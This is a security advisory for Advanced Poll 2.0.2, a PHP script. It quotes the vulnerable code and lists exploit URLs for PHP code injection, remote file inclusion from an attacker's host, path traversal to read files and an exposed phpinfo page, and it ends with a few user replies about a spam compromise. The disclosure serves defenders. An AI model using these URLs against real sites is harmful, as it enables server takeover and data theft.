Advanced Poll Remote Information Disclosure Vulnerability

It seems there is also a bug Advanced Poll 2.0.2

°°°°°°°°°°°°°
Language : PHP
Product : Advanced Poll
Version : 2.0.2 Textfile
Website : http://www.proxy2.de
Problems :
- PHP Code Injection
- File Include
- Phpinfo

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

comments.php :

------------------------------------------------------------------------------------------------------
[...]
$register_poll_vars = array("id","template_set","action");

for ($i=0;$i<sizeof($register_poll_vars);$i++) {
if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {
eval("\$$register_poll_vars[$i] =
\"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");
} elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {
eval("\$$register_poll_vars[$i] =
\"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");
} else {
eval("\$$register_poll_vars[$i] = '';");
}
}
[...]
------------------------------------------------------------------------------------------------------

booth.php, png.php :

---------------------------------------------------------------
<?php

$include_path = dirname(__FILE__);
if ($include_path == "/") {
$include_path = ".";
}

if (!isset($PHP_SELF)) {
global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
$PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
if (isset($HTTP_GET_VARS)) {
while (list($name, $value)=each($HTTP_GET_VARS)) {
$$name=$value;
}
}
if (isset($HTTP_POST_VARS)) {
while (list($name, $value)=each($HTTP_POST_VARS)) {
$$name=$value;
}
}
if(isset($HTTP_COOKIE_VARS)){
while (list($name, $value)=each($HTTP_COOKIE_VARS)){
$$name=$value;
}
}
}

require $include_path."/include/config.inc.php";
require $include_path."/include/class_poll.php";
[...]
---------------------------------------------------------------

poll_ssi.php, popup.php :

----------------------
include "./booth.php";
----------------------

admin/common.inc.php :

---------------------------------------------------------------
[...]
if (!isset($PHP_SELF)) {
$PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
if (isset($HTTP_GET_VARS)) {
while (list($name, $value)=each($HTTP_GET_VARS)) {
$$name=$value;
}
}
if (isset($HTTP_POST_VARS)) {
while (list($name, $value)=each($HTTP_POST_VARS)) {
$$name=$value;
}
}
if(isset($HTTP_COOKIE_VARS)){
while (list($name, $value)=each($HTTP_COOKIE_VARS)){
$$name=$value;
}
}
}

$pollvars['SELF'] = basename($PHP_SELF);
unset($lang);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
include ("$base_path/lang/$pollvars[lang]");
} else {
include ("$base_path/lang/english.php");
}
[...]
---------------------------------------------------------------

In the /admin/ directory, in the files :

- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php

:

------------------------------------
[...]
$include_path = dirname(__FILE__);
$base_path = dirname($include_path);

require "./common.inc.php";
[...]
------------------------------------

misc/info.php :

-------------------------
<html>
<head>
<title>PHP Info</title>
</head>
<body bgcolor="#3A6EA5">
<?php
phpinfo();
?>
-------------------------

Exploits :
°°°°°°°°

- if magic_quotes_gpc=OFF :

http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]//

or with a POST form or cookies.

- This will only work if register_globals=OFF (this is not an error...) :

http://[target]/booth.php?include_path=http://[attacker] (or with png.php,
poll_ssi.php, popup.php) will include the files :
http://[attacker]/include/config.inc.php
and
http://[attacker]/include/class_poll.php

- This will work if register_globals=OFF OR ON :

http://[target]/admin/common.inc.php?basepath=http://[attacker] will include
the file http://[attacker]/lang/english.php.

The same hole can be found, in the /admin/ directory, in the files :

- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php

but only with register_globals=OFF.
And, with register_globals=OFF and with all the files above again, the url
http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view
will include the file http://[target]/admin/../../../file/to/view

- http://[target]/misc/info.php will show the phpinfo().

Solution/More details :
°°°°°°°°°°°°°°°°°°°°
Both patch and details can be found on http://www.phpsecure.info .

Credits :
°°°°°°°°
frog-mn
http://www.phpsecure.info

I found out this the hard way. With version 2.03 of Advanced Poll the attackers used external scripts to send spam. Only when the web host disabled the website due to spam complaints did we find out.

I hope this has been fixed in newer versions (I couldn't find a change log to check) before it happens to someone else.

This is why you should always make sure your scripts are up to date.

Yes. Does that mean it is fixed?

To the best of my knowledge but as no changelog is produced and I am not a user of the Poll I couldn't say.

Ok, thanks for your help.

I found out this the hard way. With version 2.03 of Advanced Poll the attackers used external scripts to send spam. Only when the web host disabled the website due to spam complaints did we find out.